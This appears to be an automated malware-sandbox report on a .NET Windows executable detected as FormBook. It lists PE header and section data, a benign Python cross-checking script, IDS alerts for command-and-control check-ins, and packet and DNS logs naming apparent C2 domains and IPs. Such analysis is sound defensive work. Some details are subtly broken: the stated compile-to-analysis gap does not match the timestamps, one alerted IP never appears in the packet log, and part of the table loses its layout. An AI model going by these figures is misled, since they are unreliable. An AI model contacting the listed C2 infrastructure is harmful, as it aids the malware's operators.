File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....NQa..............0..8...........W... ...`....@.. ....................... ............@................................

File Icon

Icon Hash: 138e8eccece8cccc

Static PE Info

General

Entrypoint: 0x4b57ae
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: 32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp: 0x61514EA3 [Mon Sep 27 04:54:59 2021 UTC]
TLS Callbacks: none (the TLS data directory is empty)
CLR (.Net) Version: v4.0.30319
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al   (repeated 97 times: everything after the six-byte jmp is 0x00 padding, which disassembles as this instruction)

The jmp target 0x402000 is imagebase + 0x2000, the single 8-byte IAT entry listed under Data Directories, and the Imports table shows that entry is mscoree.dll!_CorExeMain. This is the standard native entry stub of a managed executable; it carries no logic of its own, so the sample's behaviour has to be read from the CIL, not from this disassembly.

Data Directories

Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0xb575c          0x4f          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0xb6000          0x19414       .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0xd0000          0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

Sections

Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy         Characteristics
.text   0x2000           0xb37b4       0xb3800   False     0.669535602368   data       6.99789102279   IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc   0xb6000          0x19414       0x19600   False     0.391635237069   data       4.29441902576   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0xd0000          0xc           0x200     False     0.044921875      data       0.101910425663  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

The .text entropy of 6.998 bits per byte is close to the 8-bit ceiling and higher than plain compiled CIL and metadata normally produce. Together with the single import (mscoree.dll!_CorExeMain) this is consistent with the "potential unpacker" and "very large strings" signatures: the second stage is carried encoded or encrypted inside the managed image and decoded at run time, so the import table says nothing about what the sample does.

Resources

Name           RVA      Size     Type
RT_ICON        0xb6180  0x10828  dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0
RT_ICON        0xc69b8  0x4228   dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 4294967295, next used block 4294967295
RT_ICON        0xcabf0  0x25a8   data
RT_ICON        0xcd1a8  0x10a8   data
RT_ICON        0xce260  0x468    GLS_BINARY_LSB_FIRST
RT_GROUP_ICON  0xce6d8  0x4c     data
RT_VERSION     0xce734  0x31c    data
RT_MANIFEST    0xcea60  0x9b0    XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF, LF line terminators

The Language and Country columns are empty for every entry. The "dBase IV DBT" and "GLS_BINARY_LSB_FIRST" types are libmagic guesses on raw icon bitmap data, not real dBase or GLS content.

Imports

DLL          Import
mscoree.dll  _CorExeMain
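The static facts above can be cross-checked in a few lines instead of read one at a time: the entrypoint is the last six bytes of .text, its jmp target is the one IAT slot that the loader fills with mscoree.dll!_CorExeMain, the raw section sizes plus a 0x200 header account for the whole 840192-byte file (so nothing is appended after the last section), and the TimeDateStamp decodes to the morning of the analysis day. The Python below is an added example, not Joe Sandbox code. Every constant is copied from this report except three assumptions: SizeOfHeaders, which the report does not list and is taken as 0x200 (the value .NET compilers emit), the six stub bytes, which are constructed from the Entrypoint Preview line, and the entropy threshold of 6.9, which is a triage heuristic rather than anything the report states.

```python
"""Cross-checks on the static PE facts in this report.

Added example, not Joe Sandbox code.  Constants are copied from the
report's Static PE Info, Data Directories and Sections tables; the
stub bytes, SizeOfHeaders and the entropy threshold are assumptions
(see the comments next to them).
"""
import math
import struct
from collections import Counter
from datetime import datetime, timezone

IMAGEBASE = 0x400000
ENTRYPOINT_VA = 0x4B57AE
IAT_RVA, IAT_SIZE = 0x2000, 0x8      # IMAGE_DIRECTORY_ENTRY_IAT
TIMESTAMP = 0x61514EA3               # COFF TimeDateStamp; it is the ".NQa" after "PE..L" in the content preview
FILE_SIZE = 840192
SIZE_OF_HEADERS = 0x200              # assumed: not in the report, the usual value for .NET compilers
# (name, virtual address, virtual size, raw size, entropy) from the Sections table
SECTIONS = [
    (".text",  0x2000,  0xB37B4, 0xB3800, 6.99789102279),
    (".rsrc",  0xB6000, 0x19414, 0x19600, 4.29441902576),
    (".reloc", 0xD0000, 0xC,     0x200,   0.101910425663),
]
# Constructed encoding of the Entrypoint Preview line `jmp dword ptr [00402000h]`: FF 25 imm32
ENTRY_STUB = b"\xff\x25" + struct.pack("<I", 0x402000)


def shannon_entropy(data):
    """8-bit Shannon entropy in bits per byte (0.0 = one repeated value, 8.0 = uniform).
    Same metric as the report's Entropy columns."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def rva_to_section(rva, sections=SECTIONS):
    """Name of the section whose virtual range contains rva, or None."""
    for name, va, vsize, _raw, _ent in sections:
        if va <= rva < va + vsize:
            return name
    return None


def is_dotnet_entry_stub(stub, imagebase=IMAGEBASE, iat_rva=IAT_RVA, iat_size=IAT_SIZE):
    """True for `FF 25 <abs addr>` whose address lies inside the IAT: the native
    entry of a managed exe is jmp [slot], and that slot is mscoree!_CorExeMain."""
    if len(stub) < 6 or stub[:2] != b"\xff\x25":
        return False
    target = struct.unpack_from("<I", stub, 2)[0]
    return imagebase + iat_rva <= target < imagebase + iat_rva + iat_size


def compile_time_utc(ts=TIMESTAMP):
    """Decode TimeDateStamp (seconds since 1970-01-01 UTC) as a readable string."""
    return datetime.fromtimestamp(ts, tz=timezone.utc).strftime("%Y-%m-%d %H:%M:%S")


def overlay_bytes(file_size=FILE_SIZE, sections=SECTIONS, headers=SIZE_OF_HEADERS):
    """Bytes left after the last section's raw data; > 0 means an appended overlay."""
    return file_size - (headers + sum(raw for _n, _va, _vs, raw, _e in sections))


def packed_sections(sections=SECTIONS, threshold=6.9):
    """Sections whose entropy meets the (assumed) packing heuristic."""
    return [name for name, _va, _vs, _raw, ent in sections if ent >= threshold]


def triage():
    """Derived facts a first-pass analyst wants: where the entrypoint lands,
    whether it is the managed stub, compile time, overlay, high-entropy sections."""
    ep_rva = ENTRYPOINT_VA - IMAGEBASE
    text_end = SECTIONS[0][1] + SECTIONS[0][2]
    return {
        "entrypoint_rva": ep_rva,
        "entrypoint_section": rva_to_section(ep_rva),
        "stub_is_last_bytes_of_text": ep_rva + len(ENTRY_STUB) == text_end,
        "dotnet_stub": is_dotnet_entry_stub(ENTRY_STUB),
        "compiled_utc": compile_time_utc(),
        "overlay_bytes": overlay_bytes(),
        "packed_sections": packed_sections(),
    }


if __name__ == "__main__":
    for key, value in triage().items():
        print(f"{key}: {value}")
```

Running it reports the entrypoint RVA 0xb57ae inside .text, a genuine managed stub, a compile time of 2021-09-27 04:54:59 UTC (about twelve and a half hours before the 17:30 analysis start), zero overlay bytes, and .text as the only section over the entropy threshold. The same functions work on values lifted from any PE header dump; only the constants at the top are specific to this sample.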

Version Infos

Description       Data
Translation       0x0000 0x04b0
LegalCopyright    Copyright F@Soft
Assembly Version  1.0.6.2
InternalName      IDLFL.exe
FileVersion       1.0.6.0
CompanyName       F@Soft
LegalTrademarks   (empty)
Comments          (empty)
ProductName       Darwin AW
ProductVersion    1.0.6.0
FileDescription   Darwin AW
OriginalFilename  IDLFL.exe

OriginalFilename (IDLFL.exe) does not match the submitted name (ejecutable1.exe), so the file was renamed before submission; the version resource is attacker-controlled and should not be treated as attribution.

Network Behavior

Snort IDS Alerts

Timestamp                 Protocol  SID      Message                               Source Port  Dest Port  Source IP       Dest IP
09/27/21-17:31:56.380230  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)  49165        80         192.168.2.22    34.102.136.180
09/27/21-17:31:56.380230  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)  49165        80         192.168.2.22    34.102.136.180
09/27/21-17:31:56.380230  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49165        80         192.168.2.22    34.102.136.180
09/27/21-17:31:56.559994  TCP       1201     ATTACK-RESPONSES 403 Forbidden        80           49165      34.102.136.180  192.168.2.22
09/27/21-17:32:24.141268  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)  49169        80         192.168.2.22    162.0.232.162
09/27/21-17:32:24.141268  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)  49169        80         192.168.2.22    162.0.232.162
09/27/21-17:32:24.141268  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49169        80         192.168.2.22    162.0.232.162
09/27/21-17:33:11.306293  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)  49174        80         192.168.2.22    93.185.100.223
09/27/21-17:33:11.306293  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)  49174        80         192.168.2.22    93.185.100.223
09/27/21-17:33:11.306293  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49174        80         192.168.2.22    93.185.100.223

The 403 from 34.102.136.180 means the first check-in was not accepted by a live panel; connections to further hosts follow in the TCP Packets table.

Network Port Distribution

TCP Packets

Timestamp                           Source Port  Dest Port  Source IP        Dest IP
Sep 27, 2021 17:31:56.365921974 CEST  49165        80         192.168.2.22     34.102.136.180
Sep 27, 2021 17:31:56.379745007 CEST  80           49165      34.102.136.180   192.168.2.22
Sep 27, 2021 17:31:56.379933119 CEST  49165        80         192.168.2.22     34.102.136.180
Sep 27, 2021 17:31:56.380229950 CEST  49165        80         192.168.2.22     34.102.136.180
Sep 27, 2021 17:31:56.393846989 CEST  80           49165      34.102.136.180   192.168.2.22
Sep 27, 2021 17:31:56.559993982 CEST  80           49165      34.102.136.180   192.168.2.22
Sep 27, 2021 17:31:56.560043097 CEST  80           49165      34.102.136.180   192.168.2.22
Sep 27, 2021 17:31:56.560276031 CEST  49165        80         192.168.2.22     34.102.136.180
Sep 27, 2021 17:31:56.560431004 CEST  49165        80         192.168.2.22     34.102.136.180
Sep 27, 2021 17:31:56.874114037 CEST  49165        80         192.168.2.22     34.102.136.180
Sep 27, 2021 17:31:56.887252092 CEST  80           49165      34.102.136.180   192.168.2.22
Sep 27, 2021 17:32:01.604357958 CEST  49166        80         192.168.2.22     184.168.131.241
Sep 27, 2021 17:32:01.790163994 CEST  80           49166      184.168.131.241  192.168.2.22
Sep 27, 2021 17:32:01.790251017 CEST  49166        80         192.168.2.22     184.168.131.241
Sep 27, 2021 17:32:01.790482998 CEST  49166        80         192.168.2.22     184.168.131.241
Sep 27, 2021 17:32:01.975771904 CEST  80           49166      184.168.131.241  192.168.2.22
Sep 27, 2021 17:32:02.171308994 CEST  80           49166      184.168.131.241  192.168.2.22
Sep 27, 2021 17:32:02.172131062 CEST  80           49166      184.168.131.241  192.168.2.22
Sep 27, 2021 17:32:02.172543049 CEST  49166        80         192.168.2.22     184.168.131.241
Sep 27, 2021 17:32:02.172714949 CEST  49166        80         192.168.2.22     184.168.131.241
Sep 27, 2021 17:32:02.358375072 CEST  80           49166      184.168.131.241  192.168.2.22
Sep 27, 2021 17:32:07.351763964 CEST  49167        80         192.168.2.22     216.172.172.208
Sep 27, 2021 17:32:07.490724087 CEST  80           49167      216.172.172.208  192.168.2.22
Sep 27, 2021 17:32:07.490979910 CEST  49167        80         192.168.2.22     216.172.172.208
Sep 27, 2021 17:32:07.491132975 CEST  49167        80         192.168.2.22     216.172.172.208
Sep 27, 2021 17:32:07.637655973 CEST  80           49167      216.172.172.208  192.168.2.22
Sep 27, 2021 17:32:08.474100113 CEST  80           49167      216.172.172.208  192.168.2.22
Sep 27, 2021 17:32:08.474483967 CEST  49167        80         192.168.2.22     216.172.172.208
Sep 27, 2021 17:32:08.475579977 CEST  80           49167      216.172.172.208  192.168.2.22
Sep 27, 2021 17:32:08.475658894 CEST  49167        80         192.168.2.22     216.172.172.208
Sep 27, 2021 17:32:08.614156961 CEST  80           49167      216.172.172.208  192.168.2.22
Sep 27, 2021 17:32:18.621284962 CEST  49168        80         192.168.2.22     162.0.229.241
Sep 27, 2021 17:32:18.784785032 CEST  80           49168      162.0.229.241    192.168.2.22
Sep 27, 2021 17:32:18.784881115 CEST  49168        80         192.168.2.22     162.0.229.241
Sep 27, 2021 17:32:18.785186052 CEST  49168        80         192.168.2.22     162.0.229.241
Sep 27, 2021 17:32:18.948822021 CEST  80           49168      162.0.229.241    192.168.2.22
Sep 27, 2021 17:32:18.948857069 CEST  80           49168      162.0.229.241    192.168.2.22
Sep 27, 2021 17:32:18.949249029 CEST  49168        80         192.168.2.22     162.0.229.241
Sep 27, 2021 17:32:18.949389935 CEST  49168        80         192.168.2.22     162.0.229.241
Sep 27, 2021 17:32:19.124420881 CEST  80           49168      162.0.229.241    192.168.2.22
Sep 27, 2021 17:32:23.974770069 CEST  49169        80         192.168.2.22     162.0.232.162
Sep 27, 2021 17:32:24.140935898 CEST  80           49169      162.0.232.162    192.168.2.22
Sep 27, 2021 17:32:24.141038895 CEST  49169        80         192.168.2.22     162.0.232.162
Sep 27, 2021 17:32:24.141268015 CEST  49169        80         192.168.2.22     162.0.232.162
Sep 27, 2021 17:32:24.307697058 CEST  80           49169      162.0.232.162    192.168.2.22
Sep 27, 2021 17:32:24.308247089 CEST  49169        80         192.168.2.22     162.0.232.162
Sep 27, 2021 17:32:24.472944975 CEST  80           49169      162.0.232.162    192.168.2.22
Sep 27, 2021 17:32:24.971518993 CEST  80           49169      162.0.232.162    192.168.2.22
Sep 27, 2021 17:32:24.971777916 CEST  49169        80         192.168.2.22     162.0.232.162
Sep 27, 2021 17:32:29.437037945 CEST  49170        80         192.168.2.22     216.239.32.21
Sep 27, 2021 17:32:29.449552059 CEST  80           49170      216.239.32.21    192.168.2.22
Sep 27, 2021 17:32:29.449654102 CEST  49170        80         192.168.2.22     216.239.32.21
Sep 27, 2021 17:32:29.450268984 CEST  49170        80         192.168.2.22     216.239.32.21
Sep 27, 2021 17:32:29.462723017 CEST  80           49170      216.239.32.21    192.168.2.22
Sep 27, 2021 17:32:29.531821966 CEST  80           49170      216.239.32.21    192.168.2.22
Sep 27, 2021 17:32:29.531872034 CEST  80           49170      216.239.32.21    192.168.2.22
Sep 27, 2021 17:32:29.531902075 CEST  80           49170      216.239.32.21    192.168.2.22
Sep 27, 2021 17:32:29.531925917 CEST  80           49170      216.239.32.21    192.168.2.22
Sep 27, 2021 17:32:29.531981945 CEST  80           49170      216.239.32.21    192.168.2.22
Sep 27, 2021 17:32:29.532022953 CEST  49170        80         192.168.2.22     216.239.32.21
                                                                  Sep 27, 2021 17:32:29.532075882 CEST8049170216.239.32.21192.168.2.22
                                                                  Sep 27, 2021 17:32:29.532104969 CEST8049170216.239.32.21192.168.2.22
                                                                  Sep 27, 2021 17:32:29.532128096 CEST8049170216.239.32.21192.168.2.22
                                                                  Sep 27, 2021 17:32:29.532143116 CEST4917080192.168.2.22216.239.32.21
                                                                  Sep 27, 2021 17:32:29.532151937 CEST8049170216.239.32.21192.168.2.22
                                                                  Sep 27, 2021 17:32:29.532176971 CEST8049170216.239.32.21192.168.2.22
                                                                  Sep 27, 2021 17:32:29.532182932 CEST4917080192.168.2.22216.239.32.21
                                                                  Sep 27, 2021 17:32:29.532246113 CEST4917080192.168.2.22216.239.32.21
                                                                  Sep 27, 2021 17:32:29.544748068 CEST8049170216.239.32.21192.168.2.22
                                                                  Sep 27, 2021 17:32:29.545041084 CEST4917080192.168.2.22216.239.32.21
                                                                  Sep 27, 2021 17:32:29.546432018 CEST8049170216.239.32.21192.168.2.22
                                                                  Sep 27, 2021 17:32:29.546521902 CEST4917080192.168.2.22216.239.32.21
                                                                  Sep 27, 2021 17:32:29.546693087 CEST8049170216.239.32.21192.168.2.22
                                                                  Sep 27, 2021 17:32:29.546752930 CEST4917080192.168.2.22216.239.32.21
                                                                  Sep 27, 2021 17:32:29.546894073 CEST8049170216.239.32.21192.168.2.22
                                                                  Sep 27, 2021 17:32:29.546921015 CEST8049170216.239.32.21192.168.2.22
                                                                  Sep 27, 2021 17:32:29.546953917 CEST4917080192.168.2.22216.239.32.21
                                                                  Sep 27, 2021 17:32:29.546981096 CEST4917080192.168.2.22216.239.32.21
                                                                  Sep 27, 2021 17:32:29.547769070 CEST8049170216.239.32.21192.168.2.22
                                                                  Sep 27, 2021 17:32:29.547871113 CEST4917080192.168.2.22216.239.32.21
                                                                  Sep 27, 2021 17:32:29.548048019 CEST8049170216.239.32.21192.168.2.22
                                                                  Sep 27, 2021 17:32:29.548121929 CEST4917080192.168.2.22216.239.32.21
                                                                  Sep 27, 2021 17:32:29.548507929 CEST8049170216.239.32.21192.168.2.22
                                                                  Sep 27, 2021 17:32:29.548538923 CEST8049170216.239.32.21192.168.2.22
                                                                  Sep 27, 2021 17:32:29.548590899 CEST4917080192.168.2.22216.239.32.21
                                                                  Sep 27, 2021 17:32:29.548613071 CEST4917080192.168.2.22216.239.32.21
                                                                  Sep 27, 2021 17:32:29.549474001 CEST8049170216.239.32.21192.168.2.22
                                                                  Sep 27, 2021 17:32:29.549506903 CEST8049170216.239.32.21192.168.2.22
                                                                  Sep 27, 2021 17:32:29.549559116 CEST4917080192.168.2.22216.239.32.21
                                                                  Sep 27, 2021 17:32:29.549582005 CEST4917080192.168.2.22216.239.32.21
                                                                  Sep 27, 2021 17:32:29.550220013 CEST8049170216.239.32.21192.168.2.22
                                                                  Sep 27, 2021 17:32:29.550304890 CEST4917080192.168.2.22216.239.32.21
                                                                  Sep 27, 2021 17:32:29.550311089 CEST8049170216.239.32.21192.168.2.22
                                                                  Sep 27, 2021 17:32:29.550389051 CEST4917080192.168.2.22216.239.32.21
                                                                  Sep 27, 2021 17:32:29.551467896 CEST8049170216.239.32.21192.168.2.22
                                                                  Sep 27, 2021 17:32:29.551501989 CEST8049170216.239.32.21192.168.2.22
                                                                  Sep 27, 2021 17:32:29.551544905 CEST4917080192.168.2.22216.239.32.21
                                                                  Sep 27, 2021 17:32:29.551579952 CEST4917080192.168.2.22216.239.32.21
                                                                  Sep 27, 2021 17:32:29.552293062 CEST8049170216.239.32.21192.168.2.22
                                                                  Sep 27, 2021 17:32:29.552325964 CEST8049170216.239.32.21192.168.2.22
                                                                  Sep 27, 2021 17:32:29.552392960 CEST4917080192.168.2.22216.239.32.21
                                                                  Sep 27, 2021 17:32:29.552432060 CEST4917080192.168.2.22216.239.32.21
                                                                  Sep 27, 2021 17:32:29.553361893 CEST8049170216.239.32.21192.168.2.22
                                                                  Sep 27, 2021 17:32:29.553414106 CEST8049170216.239.32.21192.168.2.22
                                                                  Sep 27, 2021 17:32:29.553453922 CEST4917080192.168.2.22216.239.32.21
                                                                  Sep 27, 2021 17:32:29.553544044 CEST4917080192.168.2.22216.239.32.21
                                                                  Sep 27, 2021 17:32:29.557595015 CEST8049170216.239.32.21192.168.2.22
                                                                  Sep 27, 2021 17:32:29.557634115 CEST8049170216.239.32.21192.168.2.22
                                                                  Sep 27, 2021 17:32:29.557678938 CEST4917080192.168.2.22216.239.32.21
                                                                  Sep 27, 2021 17:32:29.557704926 CEST4917080192.168.2.22216.239.32.21
                                                                  Sep 27, 2021 17:32:39.823616028 CEST4917180192.168.2.22162.251.85.174
                                                                  Sep 27, 2021 17:32:39.962132931 CEST8049171162.251.85.174192.168.2.22
                                                                  Sep 27, 2021 17:32:39.962272882 CEST4917180192.168.2.22162.251.85.174
                                                                  Sep 27, 2021 17:32:39.962572098 CEST4917180192.168.2.22162.251.85.174
                                                                  Sep 27, 2021 17:32:40.100543976 CEST8049171162.251.85.174192.168.2.22
                                                                  Sep 27, 2021 17:32:40.120680094 CEST8049171162.251.85.174192.168.2.22
                                                                  Sep 27, 2021 17:32:40.121340036 CEST4917180192.168.2.22162.251.85.174
                                                                  Sep 27, 2021 17:32:40.259923935 CEST8049171162.251.85.174192.168.2.22
                                                                  Sep 27, 2021 17:32:40.260226011 CEST4917180192.168.2.22162.251.85.174
                                                                  Sep 27, 2021 17:32:45.201394081 CEST4917280192.168.2.22101.35.124.222
                                                                  Sep 27, 2021 17:32:48.202733994 CEST4917280192.168.2.22101.35.124.222
                                                                  Sep 27, 2021 17:32:54.209279060 CEST4917280192.168.2.22101.35.124.222
                                                                  Sep 27, 2021 17:33:08.178561926 CEST4917380192.168.2.22101.35.124.222
                                                                  Sep 27, 2021 17:33:11.183537006 CEST4917380192.168.2.22101.35.124.222

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 27, 2021 17:31:56.314769983 CEST | 52167 | 53 | 192.168.2.22 | 8.8.8.8
Sep 27, 2021 17:31:56.350986958 CEST | 53 | 52167 | 8.8.8.8 | 192.168.2.22
Sep 27, 2021 17:32:01.560457945 CEST | 50591 | 53 | 192.168.2.22 | 8.8.8.8
Sep 27, 2021 17:32:01.602639914 CEST | 53 | 50591 | 8.8.8.8 | 192.168.2.22
Sep 27, 2021 17:32:07.176561117 CEST | 57805 | 53 | 192.168.2.22 | 8.8.8.8
Sep 27, 2021 17:32:07.350603104 CEST | 53 | 57805 | 8.8.8.8 | 192.168.2.22
Sep 27, 2021 17:32:13.513216972 CEST | 59030 | 53 | 192.168.2.22 | 8.8.8.8
Sep 27, 2021 17:32:13.579324961 CEST | 53 | 59030 | 8.8.8.8 | 192.168.2.22
Sep 27, 2021 17:32:18.581300020 CEST | 59185 | 53 | 192.168.2.22 | 8.8.8.8
Sep 27, 2021 17:32:18.620323896 CEST | 53 | 59185 | 8.8.8.8 | 192.168.2.22
Sep 27, 2021 17:32:23.948707104 CEST | 55616 | 53 | 192.168.2.22 | 8.8.8.8
Sep 27, 2021 17:32:23.973058939 CEST | 53 | 55616 | 8.8.8.8 | 192.168.2.22
Sep 27, 2021 17:32:29.351190090 CEST | 49972 | 53 | 192.168.2.22 | 8.8.8.8
Sep 27, 2021 17:32:29.435094118 CEST | 53 | 49972 | 8.8.8.8 | 192.168.2.22
Sep 27, 2021 17:32:39.564275026 CEST | 51771 | 53 | 192.168.2.22 | 8.8.8.8
Sep 27, 2021 17:32:39.821504116 CEST | 53 | 51771 | 8.8.8.8 | 192.168.2.22
Sep 27, 2021 17:32:45.154223919 CEST | 59867 | 53 | 192.168.2.22 | 8.8.8.8
Sep 27, 2021 17:32:45.198246956 CEST | 53 | 59867 | 8.8.8.8 | 192.168.2.22
Sep 27, 2021 17:33:08.122895002 CEST | 50315 | 53 | 192.168.2.22 | 8.8.8.8
Sep 27, 2021 17:33:08.168354034 CEST | 53 | 50315 | 8.8.8.8 | 192.168.2.22
Sep 27, 2021 17:33:11.236748934 CEST | 50072 | 53 | 192.168.2.22 | 8.8.8.8
Sep 27, 2021 17:33:11.279463053 CEST | 53 | 50072 | 8.8.8.8 | 192.168.2.22

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Sep 27, 2021 17:31:56.314769983 CEST | 192.168.2.22 | 8.8.8.8 | 0x8eb8 | Standard query (0) | www.wwiilive.com | A (IP address) | IN (0x0001)
Sep 27, 2021 17:32:01.560457945 CEST | 192.168.2.22 | 8.8.8.8 | 0xc18c | Standard query (0) | www.dunedinhyperlocal.com | A (IP address) | IN (0x0001)
Sep 27, 2021 17:32:07.176561117 CEST | 192.168.2.22 | 8.8.8.8 | 0xfc43 | Standard query (0) | www.oinfoproduto.com | A (IP address) | IN (0x0001)
Sep 27, 2021 17:32:13.513216972 CEST | 192.168.2.22 | 8.8.8.8 | 0x9c63 | Standard query (0) | www.institutosamar.com | A (IP address) | IN (0x0001)
Sep 27, 2021 17:32:18.581300020 CEST | 192.168.2.22 | 8.8.8.8 | 0x30e0 | Standard query (0) | www.multicoininvestment.com | A (IP address) | IN (0x0001)
Sep 27, 2021 17:32:23.948707104 CEST | 192.168.2.22 | 8.8.8.8 | 0x9037 | Standard query (0) | www.theseattlenotary.com | A (IP address) | IN (0x0001)
Sep 27, 2021 17:32:29.351190090 CEST | 192.168.2.22 | 8.8.8.8 | 0xce43 | Standard query (0) | www.petersonmovingco.com | A (IP address) | IN (0x0001)
Sep 27, 2021 17:32:39.564275026 CEST | 192.168.2.22 | 8.8.8.8 | 0xb02b | Standard query (0) | www.quinnwebster.top | A (IP address) | IN (0x0001)
Sep 27, 2021 17:32:45.154223919 CEST | 192.168.2.22 | 8.8.8.8 | 0x43f4 | Standard query (0) | www.lianxiwan.xyz | A (IP address) | IN (0x0001)
Sep 27, 2021 17:33:08.122895002 CEST | 192.168.2.22 | 8.8.8.8 | 0x9ff7 | Standard query (0) | www.lianxiwan.xyz | A (IP address) | IN (0x0001)
Sep 27, 2021 17:33:11.236748934 CEST | 192.168.2.22 | 8.8.8.8 | 0x1d11 | Standard query (0) | www.area-arquitectos.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Sep 27, 2021 17:31:56.350986958 CEST | 8.8.8.8 | 192.168.2.22 | 0x8eb8 | No error (0) | www.wwiilive.com | wwiilive.com | | CNAME (Canonical name) | IN (0x0001)
Sep 27, 2021 17:31:56.350986958 CEST | 8.8.8.8 | 192.168.2.22 | 0x8eb8 | No error (0) | wwiilive.com | | 34.102.136.180 | A (IP address) | IN (0x0001)
Sep 27, 2021 17:32:01.602639914 CEST | 8.8.8.8 | 192.168.2.22 | 0xc18c | No error (0) | www.dunedinhyperlocal.com | dunedinhyperlocal.com | | CNAME (Canonical name) | IN (0x0001)
Sep 27, 2021 17:32:01.602639914 CEST | 8.8.8.8 | 192.168.2.22 | 0xc18c | No error (0) | dunedinhyperlocal.com | | 184.168.131.241 | A (IP address) | IN (0x0001)
Sep 27, 2021 17:32:07.350603104 CEST | 8.8.8.8 | 192.168.2.22 | 0xfc43 | No error (0) | www.oinfoproduto.com | oinfoproduto.com | | CNAME (Canonical name) | IN (0x0001)
Sep 27, 2021 17:32:07.350603104 CEST | 8.8.8.8 | 192.168.2.22 | 0xfc43 | No error (0) | oinfoproduto.com | | 216.172.172.208 | A (IP address) | IN (0x0001)
Sep 27, 2021 17:32:13.579324961 CEST | 8.8.8.8 | 192.168.2.22 | 0x9c63 | Name error (3) | www.institutosamar.com | none | none | A (IP address) | IN (0x0001)
Sep 27, 2021 17:32:18.620323896 CEST | 8.8.8.8 | 192.168.2.22 | 0x30e0 | No error (0) | www.multicoininvestment.com | multicoininvestment.com | | CNAME (Canonical name) | IN (0x0001)
Sep 27, 2021 17:32:18.620323896 CEST | 8.8.8.8 | 192.168.2.22 | 0x30e0 | No error (0) | multicoininvestment.com | | 162.0.229.241 | A (IP address) | IN (0x0001)
Sep 27, 2021 17:32:23.973058939 CEST | 8.8.8.8 | 192.168.2.22 | 0x9037 | No error (0) | www.theseattlenotary.com | theseattlenotary.com | | CNAME (Canonical name) | IN (0x0001)
Sep 27, 2021 17:32:23.973058939 CEST | 8.8.8.8 | 192.168.2.22 | 0x9037 | No error (0) | theseattlenotary.com | | 162.0.232.162 | A (IP address) | IN (0x0001)
Sep 27, 2021 17:32:29.435094118 CEST | 8.8.8.8 | 192.168.2.22 | 0xce43 | No error (0) | www.petersonmovingco.com | | 216.239.32.21 | A (IP address) | IN (0x0001)
Sep 27, 2021 17:32:29.435094118 CEST | 8.8.8.8 | 192.168.2.22 | 0xce43 | No error (0) | www.petersonmovingco.com | | 216.239.34.21 | A (IP address) | IN (0x0001)
Sep 27, 2021 17:32:29.435094118 CEST | 8.8.8.8 | 192.168.2.22 | 0xce43 | No error (0) | www.petersonmovingco.com | | 216.239.38.21 | A (IP address) | IN (0x0001)
Sep 27, 2021 17:32:29.435094118 CEST | 8.8.8.8 | 192.168.2.22 | 0xce43 | No error (0) | www.petersonmovingco.com | | 216.239.36.21 | A (IP address) | IN (0x0001)
Sep 27, 2021 17:32:39.821504116 CEST | 8.8.8.8 | 192.168.2.22 | 0xb02b | No error (0) | www.quinnwebster.top | quinnwebster.top | | CNAME (Canonical name) | IN (0x0001)
Sep 27, 2021 17:32:39.821504116 CEST | 8.8.8.8 | 192.168.2.22 | 0xb02b | No error (0) | quinnwebster.top | | 162.251.85.174 | A (IP address) | IN (0x0001)
Sep 27, 2021 17:32:45.198246956 CEST | 8.8.8.8 | 192.168.2.22 | 0x43f4 | No error (0) | www.lianxiwan.xyz | | 101.35.124.222 | A (IP address) | IN (0x0001)
